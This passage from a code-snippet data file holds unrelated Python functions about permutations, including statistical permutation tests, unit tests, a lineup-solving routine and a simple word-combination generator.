\"\\tTotalOddsMean\\tUniqueOddsMean\\tTotal 97.5\\tTotal 2.5\\tUnique 97.5\\tUnique 2.5\\n\" \\\n \"Total\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nDel\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nIns\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\" \\\n \"\\n\\n{}\\n{}\" \\\n .format(__version__, self.args.Permutation_Type, date.today().strftime(\"%Y-%m-%d\"), self.args.Target_File,\n self.args.Segment_File, total_odds_mean, unique_odds_mean, total975, total25, unique_total975,\n unique_total25, del_odds_mean, unique_del_odds_mean, del975, del25, unique_del975, unique_del25,\n ins_odds_mean, unique_ins_odds_mean, ins975, ins25, unique_ins975, unique_ins25, odds_labels,\n odds_string)\n\n outfile = open(\"{0}{1}_odds_ratios.txt\".format(self.args.Working_Folder, self.args.Job_Name), 'w')\n outfile.write(outstring)\n outfile.close()\n self.log.info(\"Sample Permutation Complete\")\n\n return\n #\n # ratio_mean_list = []\n # ratio_std_list = []\n # ratio_list = []\n # odds_ratio_list = []\n # outstring = \"\"\n #\n # # Format data for output file.\n # for sub_group in natsort.natsorted(cell_permutation_data_dict):\n # for key, values in cell_permutation_data_dict[sub_group].items():\n # if key == \"bp\":\n # break_point_mean = int(round(scipy.mean(values)))\n # break_point_std = round(scipy.std(values), 2)\n # break_point_median = int(round(scipy.median(values)))\n # elif key == \"intsect\":\n # intersect_mean = int(round(scipy.mean(values)))\n # intersect_std = round(scipy.std(values), 2)\n # intersect_median = int(round(scipy.median(values)))\n # elif key == \"bp/intsect\":\n # ratio_mean = scipy.mean(values)\n # ratio_std = scipy.std(values)\n # ratio_list.append(values)\n #\n # ratio_mean_list.append(ratio_mean)\n # ratio_std_list.append(ratio_std)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\"\\\n # .format(break_point_mean, break_point_median, break_point_std, intersect_mean, intersect_median,\n # intersect_std)\n # outstring += \"\\t\"\n #\n # for l1, l2 in zip(ratio_list[0], ratio_list[1]):\n # odds_ratio_list.append(l1/l2)\n #\n # t = stats.t.interval(0.95, df=self.freq_calc_iterations-1, loc=scipy.mean(odds_ratio_list),\n # scale=scipy.std(odds_ratio_list) / numpy.sqrt(self.freq_calc_iterations))\n #\n # pval = stats.ttest_1samp(odds_ratio_list, 1)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\n\"\\\n # .format(round(scipy.mean(odds_ratio_list), 2), round(scipy.std(odds_ratio_list), 2), round(t[0], 2),\n # round(t[1], 2), pval[1])\n #\n # for v in odds_ratio_list:\n # outstring += \"{0}\\n\".format(v)\n #\n # outfile.write(outstring)\n # outfile.close()\n #\n # print(\"Permutation Analysis of Samples Complete.\")\n #\n # return", "def test(x_test: int, out_counter_test: int):\n for combo in permutations(input_list, x_test + 1):\n if len(set(map(str.lower, combo))) == len(combo):\n line = ''.join(combo)\n if int(args.min) <= len(line) <= int(args.max):\n print(line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.append is not None:\n print(line + args.append)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.prepend is not None:\n print(args.prepend + line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.leet is True:\n for old, new in leet_replacements:\n line = line.replace(old, new)\n print(line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.append is not None:\n print(line + 
args.append)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.prepend is not None:\n print(args.prepend + line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n return out_counter_test", "def permutations(lst):\n pass # Replace this with your implementation of the function.", "def test_permutation_bad(self):\n self.assertRaises(CircuitError, Permutation, 4, [1, 0, -1, 2])", "def find_adapted_solution(list_of_tuples, module, n_of_players_with_vote):\n\n def malus_roles_left(players_left, roles_left):\n\n \"\"\"\n Checks whether it is possible to deploy all the players by assinging\n a certain number of malus.\n \"\"\"\n\n # Permutations of the players still to be deployed. We do that because\n # we only want that combination of players in which ALL of them are\n # deployed\n players_perm = permutations(players_left, len(players_left))\n\n # Initialize the number of malus (just a number high enough)\n fin_malus = 10\n\n # For each permutation of players to be deployed\n for perm in players_perm:\n\n # Initialize two parameters: a counter and the number of malus for\n # this specific permutation. Counter is used to be sure all the\n # players in the permutation are checked\n count = 0\n temp_malus = 0\n\n # Make a copy of the roles to be covered so we can use it later to\n # delete roles that we are able to cover\n copy_of_adapted_roles = copy.copy(roles_left)\n\n # For each element in the permutation we select the corresponding\n # role and try to cover it\n for i in range(len(perm)):\n role_to_cover = roles_left[i]\n role_cand = perm[i][2]\n\n # If it is possible to cover it with a malus we increase the\n # number of malus and the counter and then remove the role from\n # the list of the roles still uncovered\n if role_to_cover in malus_roles[role_cand]:\n temp_malus += 1\n count += 1\n copy_of_adapted_roles.remove(role_to_cover)\n\n # If it is possible to cover it with no malus we just increase\n # the counter and delete the role\n elif (role_to_cover not in malus_roles[role_cand]\n and role_to_cover in compatible_roles[role_cand]):\n count += 1\n copy_of_adapted_roles.remove(role_to_cover)\n\n # Else we interrupt checking this permutation and go to the\n # one\n else:\n break\n\n # If we checked ALL the elements in the permutation and the number\n # of malus is lower than the previous value we store it\n if count == len(perm) and temp_malus < fin_malus:\n fin_malus = temp_malus\n\n # If this value is different from the default one it means we found a\n # solution and we return it\n if fin_malus != 10:\n return fin_malus\n else:\n return False\n\n def calculate(candidate, roles_of_module):\n\n \"\"\"\n This function applies the deploy_players function to look for the\n solution, if it exists. 
If all the players are deployed it returns\n True, otherwise False.\n \"\"\"\n\n # See find_solution for explanation on the try method\n try:\n to_deploy_list, roles_left = deploy_players(candidate,\n roles_of_module,\n 'adapted')\n\n # If the roles to deploy can be covered with a malus we return the\n # number of malus assigned\n\n if malus_roles_left(to_deploy_list, roles_left):\n return malus_roles_left(to_deploy_list, roles_left)\n else:\n return False\n\n except TypeError:\n return False\n\n ordered_lineup = order_by_role(list_of_tuples)\n\n all_comb = list(combinations(schemes[module], n_of_players_with_vote))\n\n for comb in all_comb:\n\n # Change from tuple to list and check wings\n comb = transf_wings(list(comb), module)\n\n # If a solution is found we return the number of malus\n if calculate(ordered_lineup, comb):\n return calculate(ordered_lineup, comb)\n\n return False", "def c_test_run_inp(self, temp_params, base_locals):\r\n return 1", "def c_test_run_inp(self, temp_params, base_locals):\r\n return 1", "def permutation(nums):\n list = []\n temp = []\n backtrack(list, temp, nums)\n return list", "def permTS(dataDict=None, dataLabel='data', mode='exact.ce'):\n\n # test calling values\n if mode not in ['exact.ce', 'exact.mc']:\n raise ValueError('RStats.permTS: Mode must be either'\n + ' \"exact.ce\" or \"exact.mc\"; got %s' % mode)\n if dataDict is None or not (isinstance(dataDict, dict) \n or len(dataDict.keys()) != 2):\n raise ValueError('RSTATS.permTX: dataDict must be'\n + ' a dictionary with exactly 2 keys')\n k = list(dataDict.keys())\n g1 = dataDict[k[0]]\n g2 = dataDict[k[1]]\n\n u = perm.permTS(\n FloatVector(g1), FloatVector(g2), alternative='two.sided',\n method=mode)\n pvalue = float(u[3][0])\n if mode == 'exact.mc':\n nmc = int(u[10][0])\n else:\n nmc = 0\n d = u[1].items() # stored as a generator (interesting...) # using next for py2/3\n estdiff = next(d) #.next() # gets the tuple with what was measured, and the value \n if dataLabel is not None:\n print('\\nPermutation Test (R permTS). 
Dataset = %s' % (dataLabel))\n print(u' Test statistic: ({:s}): {:8.4f}'.\n format(estdiff[0], estdiff[1]))\n print(u' p={:8.6f}, Nperm={:8d} [mode={:s}]'.\n format(float(pvalue), int(nmc), mode))\n return (pvalue, nmc) # return the p value and the number of mc replicatess", "def _count_block_perm(orig_vals, perm_ds, nbs, tail, rng, return_null, clip_min_value):\n orig_vals = np.atleast_2d(orig_vals)\n # uniform perm_ds for both single and paired test\n if perm_ds.ndim == 3:\n perm_ds = perm_ds[None]\n n_groups, n_observations, n_features, n_permutations = perm_ds.shape\n if n_groups > 2:\n raise ValueError(\"orig_vals should have maximum two rows for paired\")\n if n_groups == 2:\n print(\"Running a paired test\")\n else:\n print(\"Running an independent test\")\n count_vals = np.zeros(n_features)\n if clip_min_value is not None:\n print(\"Clipping minimum to {}\".format(clip_min_value))\n orig_vals = np.clip(orig_vals, clip_min_value, orig_vals.max())\n if n_groups == 2:\n orig_vals = orig_vals[0] - orig_vals[1]\n else:\n orig_vals = orig_vals[0]\n if return_null:\n null_distribution = np.zeros((nbs, n_features), dtype=orig_vals.dtype)\n for ibs in range(nbs):\n randidx = rng.choice(np.arange(n_permutations), size=n_observations)\n perm_vals = np.dstack(\n [perm_ds[:, i, :, idx] for i, idx in enumerate(randidx)]).mean(axis=-1)\n # clip\n if clip_min_value is not None:\n perm_vals = np.clip(perm_vals, clip_min_value, perm_vals.max())\n # take diff if we have two groups\n if n_groups == 2:\n perm_vals = perm_vals[0] - perm_vals[1]\n else:\n perm_vals = perm_vals[0]\n assert perm_vals.shape == orig_vals.shape\n # store perm_vals if we return the null\n if return_null:\n null_distribution[ibs] = perm_vals\n # count depending on the tail\n if tail == 1:\n count_vals += (perm_vals >= orig_vals).astype(int)\n elif tail == -1:\n count_vals += (perm_vals <= orig_vals).astype(int)\n else:\n count_vals += (np.abs(perm_vals) >= np.abs(orig_vals)).astype(int)\n return (count_vals, null_distribution) if return_null else count_vals", "def check_correctness_bc01(f):\n\n rng = np.random.RandomState([2012, 7, 19])\n batch_size = 5\n rows = 32\n cols = 30\n channels = 3\n pool_rows = 2\n pool_cols = 3\n zv = rng.randn(batch_size, rows, cols,\n channels).astype(config.floatX) * 1. 
- 1.5\n top_down_v = rng.randn(batch_size, rows / pool_rows, cols / pool_cols,\n channels).astype(config.floatX)\n\n p_np, h_np = max_pool_python(zv, (pool_rows, pool_cols), top_down_v)\n\n z_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n z_th.name = 'z_th'\n zr = z_th.dimshuffle(0, 3, 1, 2)\n\n top_down_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n top_down_th.name = 'top_down_th'\n top_down_r = top_down_th.dimshuffle(0, 3, 1, 2)\n\n p_th, h_th = f(zr, (pool_rows, pool_cols), top_down_r)\n\n func = function([z_th, top_down_th], [p_th.dimshuffle(0, 2, 3, 1),\n h_th.dimshuffle(0, 2, 3, 1)])\n\n pv, hv = func(zv, top_down_v)\n\n assert p_np.shape == pv.shape\n assert h_np.shape == hv.shape\n if not np.allclose(h_np, hv):\n print((h_np.min(), h_np.max()))\n print((hv.min(), hv.max()))\n assert False\n if not np.allclose(p_np, pv):\n diff = abs(p_np - pv)\n print('max diff ', diff.max())\n print('min diff ', diff.min())\n print('ave diff ', diff.mean())\n assert False", "def tuple_permutation(v,P):\r\n u = []\r\n w = list(v)[:]\r\n test = True\r\n for i in range(len(v)):\r\n if ((isinstance(v[i], int) == True) or (isinstance(v[i], str) == True)):\r\n if (v[i] in P):\r\n w[i] = P(v[i])\r\n else:\r\n u.append(tuple_permutation(tuple(v[i]),P))\r\n test = False\r\n if (test == True):\r\n return tuple(w)\r\n else:\r\n return tuple(u)", "def test_assign_resources_to_tmc_subarray_in_low():", "def test_distance_matrix_permutation_test_non_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return [distance_matrix_permutation_test(*args, **kwargs)[2]\r\n for i in range(10)]\r\n\r\n m = arange(9).reshape((3, 3))\r\n n = 100\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n\r\n # looks at each possible permutation n times --\r\n # compare last row to rest\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 4. 
/ 6.)", "def test_partition_T(self):\n Z = Partition(size=1000)\n for p in chain(Z, [{'k':-1, 'r': 0}, {'k': 1, 'r': -1},\n {'k': -1, 'r': -1}]):\n rows = Z.T(**p)\n self.assertEqual(rows, legacy_T(Z, **p))\n\n out = Z.V(**p)\n self.assertEqual(out, legacy_V(Z, **p))\n\n out = Z.S(**p)\n self.assertEqual(out, legacy_S(Z, **p))\n\n out = Z.S(ignore_samplesize=True, **p)\n self.assertEqual(out, legacy_S(Z, ignore_samplesize=True, **p))\n\n out = Z.A(**p)\n self.assertEqual(out, legacy_A(Z, **p))", "def permutation_test(overlap_bins, nonoverlap_bins, thresh, ntrials):\n X = num_top_snps(I(overlap_bins.values()), thresh)\n if X == 0:\n return thresh, 0, 0, 0, 1, 0, 0\n overlap_counts = {k: len(overlap_bins[k]) for k in overlap_bins}\n Y = [num_top_snps(match(overlap_counts, nonoverlap_bins), thresh) for _ in range(ntrials)]\n mean, variance = moments(Y)\n anderson, critical_values, _ = scipy.stats.anderson(Y)\n exact_p = (1 + len([y for y in Y if y >= X])) / (1 + ntrials)\n return thresh, X, mean, variance, exact_p, anderson, critical_values[2]", "def apply_permutation(l, p):\n\n for i in xrange(len(l)):\n nxt = i\n print 'change - ', i\n while p[nxt] >= 0:\n print 'before-', i, p[nxt], l, p\n\n l[i], l[p[nxt]] = l[p[nxt]], l[i]\n temp = p[nxt]\n p[nxt] -= len(p)\n nxt = temp\n print 'after -', i, p[nxt], l, p\n\n\n print l", "def make_nonparametric_ab_test(dataframe, iteration_column,\n target_column, not_normal_ids_list):\n rejected_pairs = []\n not_rejected_pairs = []\n category_list = list(itertools.combinations(not_normal_ids_list, 2))\n for i in category_list:\n ttest, p_value = mannwhitneyu(dataframe.\n loc[dataframe[iteration_column] == i[0],\n target_column],\n dataframe.\n loc[dataframe[iteration_column] == i[1],\n target_column])\n if p_value >= 0.05:\n not_rejected_pairs.append(i)\n else:\n rejected_pairs.append(i)\n return rejected_pairs, not_rejected_pairs", "def test_ppt_distinguishability_yyd_vectors():\n psi_0 = bell(0)\n psi_1 = bell(2)\n psi_2 = bell(3)\n psi_3 = bell(1)\n\n x_1 = np.kron(psi_0, psi_0)\n x_2 = np.kron(psi_1, psi_3)\n x_3 = np.kron(psi_2, psi_3)\n x_4 = np.kron(psi_3, psi_3)\n\n states = [x_1, x_2, x_3, x_4]\n probs = [1 / 4, 1 / 4, 1 / 4, 1 / 4]\n\n primal_res = ppt_distinguishability(states, probs=probs, dist_method=\"min-error\", strategy=True)\n dual_res = ppt_distinguishability(states, probs=probs, dist_method=\"min-error\", strategy=False)\n\n np.testing.assert_equal(np.isclose(primal_res, 7 / 8, atol=0.001), True)\n np.testing.assert_equal(np.isclose(dual_res, 7 / 8, atol=0.001), True)\n\n primal_res = ppt_distinguishability(\n states, probs=probs, dist_method=\"unambiguous\", strategy=True\n )\n dual_res = ppt_distinguishability(\n states, probs=probs, dist_method=\"unambiguous\", strategy=False\n )\n\n np.testing.assert_equal(np.isclose(primal_res, 3 / 4, atol=0.001), True)\n np.testing.assert_equal(np.isclose(dual_res, 3 / 4, atol=0.001), True)", "def permute(self):\n raise NotImplementedError()", "def ks_permutation_var(stat, series1, series2):\n x1 = series1\n x2 = series2\n lx1 = len(x1)\n lx2 = len(x2)\n data_x = np.concatenate([x1, x2], axis=0)\n rng = np.random.default_rng(seed=42)\n ks_res = []\n n_samp = 1000\n for j in range(n_samp):\n x_con = rng.permutation(data_x)\n x1_perm = x_con[:lx1]\n x2_perm = x_con[lx2:]\n ks_res.append(stats.ks_2samp(x1_perm, x2_perm)[0])\n ks_list = np.sort(ks_res)\n ks_arg = np.arange(start=1, stop=n_samp+1)/n_samp\n p_val = 1-np.interp(stat, ks_list, ks_arg)\n return p_val", "def permutation(self, x):\r\n x = 
array(x)\r\n x = roll(x, self.num_calls)\r\n self.num_calls += 1\r\n return x", "def par_test_11(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def test_permute_2d(self):\r\n a = reshape(arange(9), (3, 3))\r\n self.assertEqual(permute_2d(a, [0, 1, 2]), a)\r\n self.assertEqual(permute_2d(a, [2, 1, 0]),\r\n array([[8, 7, 6], [5, 4, 3], [2, 1, 0]]))\r\n self.assertEqual(permute_2d(a, [1, 2, 0]),\r\n array([[4, 5, 3], [7, 8, 6], [1, 2, 0]]))", "def test_tpr_fwer(self, syn_genomic_data, syn_labels, syn_labels_0based, syn_labels_cat, syn_fm, syn_idx, rep, syn_true_pvalues):\n\n window_lengths = [35]\n\n best_params_montaez = {'epochs': 500, 'l1_reg': 0.001, 'l2_reg': 0.0001,'lr' :1e-05, 'dropout_rate':0.3, 'hidden_neurons':64, 'n_snps': n_total_snps}\n\n # n_permutations = 2\n\n def combi_compute_pvalues(d, x, fm, l,filter_window_size,pf,ps,k):\n #clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30\n idx, pvalues, _ = combi_method(d, x,fm, l,filter_window_size,pf,ps,k)\n\t\t\t#combi_method(classifier,data, fm, labels, filter_window_size, pnorm_filter, psvm, top_k)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[idx] = pvalues\n del d, l\n return pvalues_filled\n\n def challenger_compute_pvalues(d, x, l_0b, l, idx):\n is_only_zeros = False\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model(best_params_montaez)\n\n model.fit(x=x[idx.train], y=l_0b[idx.train],\n validation_data=(x[idx.test], l_0b[idx.test]),\n epochs=best_params_montaez['epochs'],\n callbacks=[\n ReduceLROnPlateau(monitor='val_loss',\n mode='min'),\n ])\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha2Beta1(model)\n weights = analyzer.analyze(x).sum(0)\n\n if np.max(abs(weights)) < 0.005:\n fig, axes = plt.subplots(1)\n is_only_zeros = True\n axes.plot(np.absolute(weights).sum(axis=1))\n fig.savefig(os.path.join(IMG_DIR, 'test.png'))\n\n pvalues_list = np.zeros((len(window_lengths), weights.shape[0]))\n for i, filter_size in enumerate(window_lengths):\n top_indices_sorted, _ = postprocess_weights(\n weights, top_k, filter_size, p_svm, p_pnorm_filter)\n pvalues = chi_square(d[:, top_indices_sorted], l)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[top_indices_sorted] = pvalues\n pvalues_list[i] = pvalues_filled\n del d, x, l\n\n return pvalues_list, is_only_zeros\n\n fm_2d = syn_fm(\"2d\")\n fm_3d = syn_fm(\"3d\")\n clf = LinearSVC(penalty='l2', loss='hinge', C=1.0000e-05, dual=True, tol=1e-3, verbose=0)\n\n pvalues_per_run_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n combi_compute_pvalues)(clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30) for i in tqdm(range(rep))))\n\n pvalues_per_run_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n chi_square)(syn_genomic_data[str(i)][:], syn_labels[str(i)]) for i in tqdm(range(rep))))\n\n # len(thresholds) * len(window_sizes) * 10020\n a = Parallel(n_jobs=-1, require='sharedmem')(delayed(\n challenger_compute_pvalues)(syn_genomic_data[str(i)][:], fm_3d[str(i)][:], syn_labels_cat[str(i)], syn_labels[str(i)], syn_idx[str(i)]) for i in tqdm(range(rep)))\n\n # INNvestigate bugfix\n zeros_index = np.array(list(np.array(a)[:, 1]))\n 
pvalues_per_run_dense = np.array(list(np.array(a)[:, 0]))\n\n pvalues_per_run_combi = pvalues_per_run_combi[np.logical_not(zeros_index)]\n pvalues_per_run_dense = pvalues_per_run_dense[np.logical_not(zeros_index)]\n pvalues_per_run_rpvt = pvalues_per_run_rpvt[np.logical_not(zeros_index)]\n true_pvalues = syn_true_pvalues[np.logical_not(zeros_index)]\n\n # COMBI\n res_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(pvalues_per_run_combi, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n tpr_combi, _, fwer_combi, precision_combi = res_combi.T\n\n\n # T_star - WARNING TAKES FOREVER\n tpr_permuted = 0\n fwer_permuted = 0\n precision_permuted = 0\n\n \"\"\"\n for i in range(rep):\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model_2(best_params_montaez_2)\n t_star = permuted_deepcombi_method(model, h5py_data[str(i)][:], fm_3d[str(i)][:], labels[str(i)], labels_cat[str(i)], n_permutations, alpha_sig_toy, filter_window_size, top_k, mode='all' )\n ground_truth = np.zeros((1,n_total_snps),dtype=bool)\n ground_truth[:,5000:5020] = True\n tpr, _, fwer, precision = compute_metrics(pvalues_per_run_rpvt[i], ground_truth, t_star) \n tpr_permuted += tpr\n fwer_permuted += fwer\n precision_permuted += precision\n tpr_permuted/=rep\n fwer_permuted/=rep\n precision_permuted/=rep\n \"\"\"\n\n # RPVT\n\n res_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_per_run_rpvt, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_rpvt, _, fwer_rpvt, precision_rpvt = res_rpvt.T\n\n # Plot\n fig, axes = plt.subplots(2)\n fig.set_size_inches(18.5, 10.5)\n ax1, ax2 = axes\n\n ax1.set_ylim(0, 0.45)\n ax1.set_xlim(0, 0.1)\n\n ax1.set_ylabel('TPR')\n ax1.set_xlabel('FWER')\n ax1.plot(fwer_combi, tpr_combi, '-o',\n label='Combi')\n ax1.plot(fwer_rpvt, tpr_rpvt, '-o',\n label='RPVT')\n #ax1.plot(fwer_permuted, tpr_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n ax2.set_ylabel('Precision')\n ax2.set_xlabel('TPR')\n ax2.plot(tpr_combi, precision_combi, '-o',\n label='Combi')\n ax2.plot(tpr_rpvt, precision_rpvt, '-o',\n label='RPVT')\n #ax2.plot(tpr_permuted, precision_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n # Save results\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-tpr-{}'.format(ttbr)), tpr_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-fwer-{}'.format(ttbr)), fwer_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-precision-{}'.format(ttbr)), precision_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-tpr-pt{}'.format(ttbr)), tpr_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-fwer-pt{}'.format(ttbr)), fwer_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-precision-pt{}'.format(ttbr)), precision_permuted)\n\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-tpr-{}'.format(ttbr)), tpr_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-fwer-{}'.format(ttbr)), fwer_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-precision-{}'.format(ttbr)), precision_rpvt)\n\n # CHALLENGER\n for i, window in enumerate(window_lengths):\n pvalues_challenger = pvalues_per_run_dense[:, i]\n\n res_dense = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_challenger, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_dense, _, fwer_dense, precision_dense = res_dense.T\n np.save(os.path.join(NUMPY_ARRAYS, 'tpr-{}-{}'.format(window, ttbr)), tpr_dense)\n 
np.save(os.path.join(NUMPY_ARRAYS, 'fwer-{}-{}'.format(window, ttbr)), fwer_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'precision-{}-{}'.format(window, ttbr)), precision_dense)\n assert fwer_combi.max() <= 1 and fwer_combi.min() >= 0\n ax1.plot(fwer_dense, tpr_dense, '-x', label='DeepCOMBI')\n ax2.plot(tpr_dense, precision_dense, '-x', label='DeepCOMBI')\n\n ax1.legend()\n ax2.legend()\n fig.savefig(\n os.path.join(IMG_DIR, 'tpr_fwer_montaez_combi_newsettings.png'.format(zeros_index.sum())),\n dpi=300)", "def test_two_and_three_card_petitions(self):\n f = gtrutils.check_petition_combos\n\n self.assertTrue( f( 0, 0, [], True, True))\n\n self.assertFalse( f( 1, 0, [], True, True))\n self.assertFalse( f( 1, 0, [1], True, True))\n self.assertTrue( f( 1, 0, [2], True, True))\n self.assertTrue( f( 1, 0, [3], True, True))\n self.assertFalse( f( 1, 0, [4], True, True))\n self.assertTrue( f( 1, 1, [], True, True))\n self.assertTrue( f( 1, 2, [], True, True))\n self.assertTrue( f( 1, 3, [], True, True))\n self.assertFalse( f( 1, 4, [], True, True))\n\n self.assertFalse( f( 1, 1, [2], True, True))\n self.assertFalse( f( 1, 1, [3], True, True))\n self.assertFalse( f( 1, 2, [2], True, True))\n self.assertFalse( f( 1, 3, [2], True, True))\n self.assertFalse( f( 1, 3, [3], True, True))\n\n self.assertTrue( f( 2, 1, [2], True, True))\n self.assertTrue( f( 2, 1, [3], True, True))\n self.assertTrue( f( 2, 0, [4], True, True))\n self.assertTrue( f( 2, 0, [5], True, True))\n self.assertTrue( f( 2, 0, [6], True, True))\n self.assertTrue( f( 2, 4, [], True, True))\n self.assertTrue( f( 2, 5, [], True, True))\n self.assertTrue( f( 2, 6, [], True, True))\n \n self.assertTrue( f(13, 26, [], True, True))\n self.assertTrue( f(13, 39, [], True, True))\n self.assertTrue( f(13, 0, [26], True, True))\n self.assertTrue( f(13, 14, [12], True, True))\n self.assertTrue( f(13, 13, [10], True, True))\n self.assertTrue( f(13, 15, [11], True, True))\n self.assertFalse( f(13, 40, [], True, True))\n self.assertFalse( f(13, 11, [3], True, True))\n\n self.assertFalse( f(4, 1, [2,3,6], True, True))\n self.assertTrue( f(5, 1, [2,3,6], True, True))\n self.assertTrue( f(6, 1, [2,3,6], True, True))\n self.assertFalse( f(7, 1, [2,3,6], True, True))", "def permutations(iterable):\n pass", "def par_test_13(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def checkPermutation(s, t):\n\n # Count each unique letter in both strings and compare the two dicts.\n s_count = {}\n t_count = {}\n for character in s:\n s_count[character] = s_count.get(character, 0) + 1\n\n for character in t:\n t_count[character] = t_count.get(character, 0) + 1\n\n return s_count == t_count\n\n # Time Complexity: O(n)\n # Space Complexity: O(n)", "def trivial_phase(indivs):\r\n\tpool=make_pool(len(indivs[0]))\r\n\r\n\tfor i in xrange(1,len(pool)+1):\r\n\t\tall_combi=itertools.combinations(pool,i)\r\n\t\tfor t in all_combi:\r\n\t\t\tt+=t\r\n\t\t\tcandidate_couples=list(itertools.combinations(t,2))\r\n\t\t\tgeno_list=map(lambda x: mix(x[0],x[1]), candidate_couples)\r\n\t \t\tif check(indivs, geno_list):\r\n\t \t\t\treturn list(set(t)), candidate_couples\r\n\tprint \"It's impossible to execute this, something must be wrong.\"", "def _pfunc(i,j,perm):\n if perm[i-1] == j:\n return 1\n else:\n return 0", "def pval(self, **kwargs):\n 
raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def distance_matrix_permutation_test(matrix, cells, cells2=None,\r\n f=t_two_sample, tails=None, n=1000, return_scores=False,\r\n is_symmetric=True):\r\n # if matrix is symmetric convert all indices to lower trangular\r\n if is_symmetric:\r\n cells = get_ltm_cells(cells)\r\n if cells2:\r\n cells2 = get_ltm_cells(cells2)\r\n # pull out the special values\r\n special_values, other_values = \\\r\n get_values_from_matrix(matrix, cells, cells2, is_symmetric)\r\n # calc the stat and parameteric p-value for real data\r\n stat, p = f(special_values, other_values, tails)\r\n # calc for randomized matrices\r\n count_more_extreme = 0\r\n stats = []\r\n indices = range(len(matrix))\r\n for k in range(n):\r\n # shuffle the order of indices, and use those to permute the matrix\r\n permuted_matrix = permute_2d(matrix, permutation(indices))\r\n special_values, other_values = \\\r\n get_values_from_matrix(permuted_matrix, cells,\r\n cells2, is_symmetric)\r\n # calc the stat and p for a random subset (we don't do anything\r\n # with these p-values, we only use the current_stat value)\r\n current_stat, current_p = f(special_values, other_values, tails)\r\n stats.append(current_stat)\r\n if tails is None:\r\n if abs(current_stat) > abs(stat):\r\n count_more_extreme += 1\r\n elif tails == 'low':\r\n if current_stat < stat:\r\n count_more_extreme += 1\r\n elif tails == 'high':\r\n if current_stat > stat:\r\n count_more_extreme += 1\r\n\r\n # pack up the parametric stat, parametric p, and empirical p; calc the\r\n # the latter in the process\r\n result = [stat, p, count_more_extreme / n]\r\n # append the scores of the n tests if requested\r\n if 